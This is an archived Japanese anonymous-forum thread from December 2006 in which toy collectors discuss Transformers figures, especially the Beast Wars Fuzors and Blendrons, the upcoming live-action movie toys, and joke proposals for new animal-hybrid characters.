本編にほぼ毎回出てくるのに国内じゃ一般販売されなかった・・・
今じゃ考えられないことだろうな

というか頭部追加してTFコレで出して欲しかったよ。

332 :ぼくらはトイ名無しキッズ:2006/12/24(日) 15:55:35 ID:vJIIRIsO0
限定とはいえ復刻されただけでも良しと思わなきゃ。
あれは絶対復刻されないと思ってたし。

333 :ぼくらはトイ名無しキッズ:2006/12/24(日) 16:06:22 ID:XokUglgw0
最初見たときは目を疑ったね
何このライドアーマーと思ったよ
他にもホイルジャックやトラックスとか全然違うよね
剣道の面と変身忍者嵐がアニメじゃホイルジャックと万年酔っ払いみたいな顔だし

334 :ぼくらはトイ名無しキッズ:2006/12/24(日) 16:48:24 ID:vJIIRIsO0
アニメと全然違うならスカイファイアーあたりが筆頭じゃないか?
アメリカの子供たちはどんな気持ちであのオモチャ買ってたんだろうな。
ロボテックでもっと混乱してたりして。

335 :ぼくらはトイ名無しキッズ:2006/12/24(日) 17:06:40 ID:iobp8B1I0
>>327
12月はなぜかオークションの落札価格が高騰する。
ボーナスとかクリスマスとかあるからかね。

336 :ぼくらはトイ名無しキッズ:2006/12/24(日) 17:19:36 ID:3I23O1RS0
>>334
たまにはフェニックスホークの事も思い出してあげてください。

337 :ぼくらはトイ名無しキッズ:2006/12/24(日) 17:25:42 ID:lU/T6cr20
バトルテック懐かしいなあ。
俺は富士見版から入ったから、印象としてはACみたいなののほうが強いけど。
シャドウホークはダグラムだったんだっけ?

338 :ぼくらはトイ名無しキッズ:2006/12/24(日) 20:07:29 ID:LEG7s2FoO
勢いだけで書くが、今月の映画秘宝読んだら、実写TFのコンボイ(全身図)が小さく載ってた。それに対し
「デザインが複雑なんで玩具じゃ変形は再現不可能かも」
と(冗談めかしてるとはいえ)舐めたコメントがあったんで、タカラには頑張って欲しい。
コメント書いた奴にカーロボやMP司令官やキングエクスwを叩きつけてやりたいお。

339 :ぼくらはトイ名無しキッズ:2006/12/24(日) 20:14:54 ID:ImVnNdpM0
むしろビーストマシーンズ系を・・・
と思ったけど、あれ案外本編に似てるの少ないんだな。
変形自体は頑張ってるんだけど。
ストライカは結構、両形態で似てる部類かな?

340 :ぼくらはトイ名無しキッズ:2006/12/24(日) 21:35:07 ID:/WU+5QX8O
>>339
タンクドローンが似てるかな。
モーターサイクルドローンは指の数が違うんだよなぁ…

341 :ぼくらはトイ名無しキッズ:2006/12/24(日) 23:58:39 ID:Zk2bBzct0
バイナルデッドエンド買ったんだけど、変形過程の1でジョイントAの外し方が分からず
折ってしまった・・・orz
つうかあの構造で、あの説明じゃ折るよなあ。

342 :ぼくらはトイ名無しキッズ:2006/12/25(月) 00:20:28 ID:hvxEF4DR0
いや、普通折らない。そんな報告も聞いた事無いし。
自分の不器用を呪え。

343 :ぼくらはトイ名無しキッズ:2006/12/25(月) 08:26:26 ID:a6k7qYwZ0
>>338
それはリアルに死ねるw
変形は少しデフォルメしてあげればそれほど無理でもないような気がしてくるよ

344 :ぼくらはトイ名無しキッズ:2006/12/25(月) 12:12:08 ID:rZv+YUVQ0
ブラックアウトさんもそんな感じだしな

345 :ぼくらはトイ名無しキッズ:2006/12/25(月) 18:35:28 ID:bkE2EA4p0
既に大半のキャラの玩具試作が出てるけど、
みんなかなりデフォルメされてるよ。
変形パターンもディテールも。

346 :ぼくらはトイ名無しキッズ:2006/12/25(月) 18:49:34 ID:dE1J04au0
むしろご褒美です

347 :ぼくらはトイ名無しキッズ:2006/12/25(月) 20:10:24 ID:Gj3aZcKk0
流れを大切断しつつラートラータを購入。
・・・ナニコレ。

設計したやつは○ってるな。

348 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:05:09 ID:dE1J04au0
フューザースデザインした奴は○ってるね

349 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:06:34 ID:dE1J04au0
ageちまった
ゴメンorz

350 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:29:34 ID:Gj3aZcKk0
ドンマイ。

これでフューザーはバズクロー以外揃ったけど、
その中でもズバ抜けて○ってる気が。

シルボルなんかは普通にカッコいいのに・・・

351 :ぼくらはトイ名無しキッズ:2006/12/25(月) 23:19:19 ID:D1BVUMqv0
あの連中の中ではむしろワンワンが異端。

352 :ぼくらはトイ名無しキッズ:2006/12/26(火) 00:28:29 ID:ferH5eVdO
フューザースは普通じゃなくてもカッコいい。
正直個人的にTFで2番目位に好きなシリーズだわw

353 :ぼくらはトイ名無しキッズ:2006/12/26(火) 00:34:04 ID:rmgAbo/R0
俺はミュータントビーストが大好きだぜ

ワニとウルヴァリーンしか持ってないけど……梟欲しい……

354 :ぼくらはトイ名無しキッズ:2006/12/26(火) 01:13:16 ID:vQLyrvOG0
>>352
>TFで2番目位に好きなシリーズ

単にロボットロボットしてないフィギュアが好きなだけちゃうんかw

355 :ぼくらはトイ名無しキッズ:2006/12/26(火) 01:13:34 ID:vaJ/J53G0
フューザーはそれぞれに味わい深くてタマラン。
キモかっこよさとキャラ立ちなら何と言ってもラートラータ=インジェクター
(海外版バイオスペックには「自分を宇宙1美しいと思ってる」なんて表記が!)
武器持ったまま変形のテラゲーター、魔王の風格のノクトロも魅力満点。
でも一番のお気に入りは武器の組み換えが楽しいバズクローかな。

356 :ぼくらはトイ名無しキッズ:2006/12/26(火) 02:19:09 ID:ferH5eVdO
>>354
いやいやw
ちゃんと他のシリーズとか好きだよ。
プライマス手に入れたときとか脱糞祭り並みに興奮したw

>>355
ハンサムなエアハマーを忘れてもらっちゃ困るな!

357 :ぼくらはトイ名無しキッズ:2006/12/26(火) 08:43:05 ID:vaJ/J53G0
>>356
エアハマーはなかなかの働き者
手がクリップになってるからイベントなんかで値札持ちとして活躍してくれたさ。
ビーストモードがアレな割にはロボットモードが普通にかっこ良くて反則気味。

358 :ぼくらはトイ名無しキッズ:2006/12/26(火) 15:19:00 ID:UT0MAahj0
>>357
イブキさんとも戦わせられるしねw

359 :ぼくらはトイ名無しキッズ:2006/12/26(火) 18:04:00 ID:w0ONQo0zO
ブレントロンとかいじっくてるとフューザーズだけでこんだけスレが盛り上がるのもなんか分かる気がする

別にアニメとか関係なくていいから新作フューザーズとか作って欲しいなぁ〜

いや無理なのは百も承知なんだが

360 :ぼくらはトイ名無しキッズ:2006/12/26(火) 18:28:35 ID:vQLyrvOG0
>ブレントロン

ベル屋のラートラータもいつのまにか完売してるし地味に人気だよな。w

361 :ぼくらはトイ名無しキッズ:2006/12/26(火) 19:47:17 ID:78nZpjHI0
しかしエルファオルファだけはなんだか凡才というか普通で物足りなかった。
ドランクロンなんかは、一人奇面フラッシュ!とかやると楽しいんだけどな

362 :ぼくらはトイ名無しキッズ:2006/12/26(火) 20:53:52 ID:iGA32VAp0
エルファはアニメでカッコいい。
変身バンクの顔がぐにゃっ〜と分割されるシーンのグロさが可愛らしい。
あとパンチ一発で空間に穴あけたり、牙がビッグコンボイと見紛われたり、美味しいところを貰っていった。

363 :ぼくらはトイ名無しキッズ:2006/12/26(火) 21:08:26 ID:nuNLPlAq0
読んでたら俺もなんか無性に欲しくなってきた。



364 :347:2006/12/26(火) 22:29:31 ID:eKvsgwvS0
>ベル屋のラートラータ完売
カートに入れる前に残2だったから、半分は俺のせいだなw

ところで・・・

話題にしてももらえない、バンターとクイックストライクは要らない子ですか?
どっちも地味っちゃ地味だがイイデキだと思うんだ。

365 :ぼくらはトイ名無しキッズ:2006/12/26(火) 22:41:41 ID:T7V6X7a50
>クイックストライク
安易に手足を隠さないで、ビーストモードのパーツをロボットモードの手足にしてるのは好印象。
この変形パターンを無印の頃に採用していれば完璧なビーストモードができたと思う。

隙の無い変形だが、フューザー自体元々訳判らない姿の上にクリアー樹脂成型のため、
結局他のフューザー同様訳のわからないビーストモードになってしまった。
アニメでも他のキャラに比べてキャラ立ちが弱めだったし、
どうもこの子は生まれる時を間違えたような気がしてならない。

366 :ぼくらはトイ名無しキッズ:2006/12/26(火) 23:08:25 ID:iGA32VAp0
アニメのフューザースは「ありえない生物」
ブレントロンは「どっかの惑星にいそうな気がする生物」だと思う。

クイストのクリアーパーツは市川先生が絶賛してたな。
「実際の蠍にも透明なのがいる」とかなんとかで。

367 :ぼくらはトイ名無しキッズ:2006/12/27(水) 00:17:49 ID:IYk/XobY0
バンブルビーの脚にある歯車状のパーツとか観察してると、映画版TOYって
劇中のTFシーンを再現する、一部が連動変形するギミックがデフォで仕込まれてるのかも。

368 :ぼくらはトイ名無しキッズ:2006/12/27(水) 02:10:26 ID:Onab0aiE0
>>366
「ハチとミノカサゴ」とか「ゾウとシャチ」とかありえないのに妙に馴染んでるんだよな。
「水牛とコウモリ」もそうだけど、生物としてありえなくもないラインになってる
ドランクロンは下手すると地球にもいそう

エルファオルファは陸のパワーと海のパワーの融合って感じでナイスだと思うな

369 :ぼくらはトイ名無しキッズ:2006/12/27(水) 02:31:59 ID:MxYydEPt0
>ドランクロンは下手すると地球にもいそう

いねーよw

でもカサゴバチっていう名前の蜂は本当にいそうな感じがする。







いねーよwww

370 :ぼくらはトイ名無しキッズ:2006/12/27(水) 02:55:54 ID:hN4BdM7b0
次のフューザース戦士でも考えようか

ツル+カメ

371 :ぼくらはトイ名無しキッズ:2006/12/27(水) 03:01:09 ID:E0yL9Bwc0
しかも大方の予想を裏切って
ツルの胴体からカメの手足が生えてるに違いない。

372 :ぼくらはトイ名無しキッズ:2006/12/27(水) 06:23:23 ID:b2oho0lk0
>>370

ゲルショッカーに相談だ!

373 :ぼくらはトイ名無しキッズ:2006/12/27(水) 08:25:04 ID:XA6itHuu0
>>372
あそこは電化製品とくっつけちゃったりするからな〜

374 :ぼくらはトイ名無しキッズ:2006/12/27(水) 10:03:45 ID:eaPcrMxi0
>>373
それデストロン。
いや、こっちのデストロンではなく
あっちのデストロンなのだが。

375 :ぼくらはトイ名無しキッズ:2006/12/27(水) 10:33:27 ID:w+in6u0R0
そこで銀帝軍ゾーンですよ。

376 :ぼくらはトイ名無しキッズ:2006/12/27(水) 12:13:26 ID:u5IxYexN0
みんなでデストロン賛歌を斉唱しようじゃないか。

ゲマ屋でCDの曲名検索で「デストロン賛歌」を探したら
トランフォーマーとV3の両方がヒットして笑ったよ。

377 :ぼくらはトイ名無しキッズ:2006/12/27(水) 12:41:19 ID:eaPcrMxi0
第一話で掟破りの主役の妹惨殺。
今やったら、鬱展開の大合唱だろうなあ。
ブイスリャァッ!

378 :ぼくらはトイ名無しキッズ:2006/12/27(水) 12:49:38 ID:nxjGG+mG0
種死ワロ

なんだか微妙にカオスな流れ

379 :ぼくらはトイ名無しキッズ:2006/12/27(水) 12:58:30 ID:SU/5/MvU0
ジャンクの寄せ集めで作れないかなニューフューザーズ


380 :ぼくらはトイ名無しキッズ:2006/12/27(水) 14:06:14 ID:hattGkpb0
エネミオライッ!!エニタイファイッ!!

381 :ぼくらはトイ名無しキッズ:2006/12/27(水) 16:58:34 ID:gijnEdViO
>>380
宮迫噴いた

382 :ぼくらはトイ名無しキッズ:2006/12/27(水) 18:00:44 ID:+0dC6sq20
カナリアとコブラでかなり、
いやなんでもねぇ…

383 :ぼくらはトイ名無しキッズ:2006/12/27(水) 18:19:20 ID:MxYydEPt0
ゾウとシャチとか絶対日本人じゃ思いつかねーよw
バカじゃねーのwww(←絶大なる褒め言葉)

384 :ぼくらはトイ名無しキッズ:2006/12/27(水) 18:48:39 ID:nxjGG+mG0
逆にビークルタイプのヒューザー戦士・・・・・なんだかとんでもなく微妙なものを連想してしまった

385 :ぼくらはトイ名無しキッズ:2006/12/27(水) 19:17:27 ID:HT8tgqo70
羽が生えた消防車とか
羽が生えたレーシングカーとか

386 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:06:43 ID:7Rj0lkH30
つ【トラックス】
つ【オーバードライブ】
つ【カムシャフト】
つ【ダウンシフト】

387 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:20:30 ID:hattGkpb0
フューザーがどうのこうのと言うより
生ビーストの新作が今後出る可能性が無ければどうしようもないんじゃないか

>>384
恐竜戦車のメガトロンか

388 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:31:30 ID:vpQS1VjyO
>>384
つWマイクロチーム

389 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:45:44 ID:f+hUTxHu0
前部分が車で後ろ部分が飛行機。
後ろが飛行機の車輪なので早く走れません。
そしてバランスが悪くて飛べません。

ダメだな・・・

390 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:52:44 ID:nxjGG+mG0
俺の描いたフューザー戦士というのはもっとこう理不尽な・・・・

>>387
今の小学生はクリーチャーとか好きそうだからそうでもないと思うけどな
恐竜戦車・・・・今度はマシンと動物のフューザー戦士ですかw

391 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:55:15 ID:+0dC6sq20
毛の生えた車出せ。

392 :ぼくらはトイ名無しキッズ:2006/12/27(水) 20:59:30 ID:1XxXF3VR0
>>384
触っただけで壊れるのではないかという不安がある

393 :ぼくらはトイ名無しキッズ:2006/12/27(水) 21:01:22 ID:hattGkpb0
>>390
何がそうでもないの?
どの部分に掛かってるレスなのかわからんよ・・・

394 :ぼくらはトイ名無しキッズ:2006/12/27(水) 23:29:31 ID:vl4QTELW0
いきつけの玩具屋に何故かシャドウホーク(コスモタイプだけど)が置いてあったから即買いしてみたが、
ザコキャラにしとくにはホントに勿体無いな…脚の処理が堪らなく良い
GFランブルもスゲーと思ったが格好の良さならコッチの方が上だね

395 :ぼくらはトイ名無しキッズ:2006/12/27(水) 23:58:30 ID:L+5cGvpU0
映画見てえ

396 :ぼくらはトイ名無しキッズ:2006/12/28(木) 00:02:07 ID:1K6DHHey0
通常シャドーホークを入手できたことに慢心してコスモタイプ逃した俺は負け組。

397 :ぼくらはトイ名無しキッズ:2006/12/28(木) 01:24:16 ID:fbNuuxvA0
俺フューザーズ玄武
蛇+亀

以前別のスレで話題に上がった亀象蛇フューザーズ湯肉論
ttp://f59.aaa.livedoor.jp/~tfdb/tfmoe/imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20061102223039&parent=1869

398 :ぼくらはトイ名無しキッズ:2006/12/28(木) 02:23:28 ID:Mz3dsugH0
フューザーズの良い所って意外性だと思うんだ

399 :ぼくらはトイ名無しキッズ:2006/12/28(木) 07:55:34 ID:ACjrxajd0
>>397
>蛇+亀
それ何てクビナガガメ?

400 :ぼくらはトイ名無しキッズ:2006/12/28(木) 08:54:15 ID:ORaAF5M7O
ニューフューザーズか、略してニューザーズw

じぁ俺は「豚+鮫」「蚊+羊」
ダイソーとかの100円フィギュアとなんらかのジャンクでつくれないかな

401 :ぼくらはトイ名無しキッズ:2006/12/28(木) 14:19:39 ID:Mz3dsugH0
>「豚+鮫」「蚊+羊」

方向性はそんなだよな、フューザーズって。

402 :ぼくらはトイ名無しキッズ:2006/12/28(木) 14:46:19 ID:TwLdGbl/0
>>393
「生ビーストの新作が今後出る可能性が無ければどうしようもない」
という部分で、はじめからフューザー戦士のラインで始めてもいいんじゃないか、ということです

しかし動物愛護団体とかから批判こなかったのかな、この玩具w

403 :ぼくらはトイ名無しキッズ:2006/12/28(木) 15:10:25 ID:1i1WwPwC0
>動物愛護団体とかから批判こなかったのかな
どっかの誰かが動物を殺して切り貼りして「リアルフューザーだ!」とかやらない限りは無いだろよw


カモノハシって発見当初はリアルフューザー扱いだったんだよな。

404 :ぼくらはトイ名無しキッズ:2006/12/28(木) 15:28:55 ID:ORaAF5M7O
しかしフューザーズの融合具合ってグリフォンやヌエとかの動物パーツ合体とかじゃなくて〜、
まさに動物が混ざり合ってるみたいなキモカッコよさなんだよな〜解るかな〜

405 :ぼくらはトイ名無しキッズ:2006/12/28(木) 16:10:29 ID:z+1wH5P10
>>384-385
それフツーにパワードコンボイになるんじゃ・・・

107 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)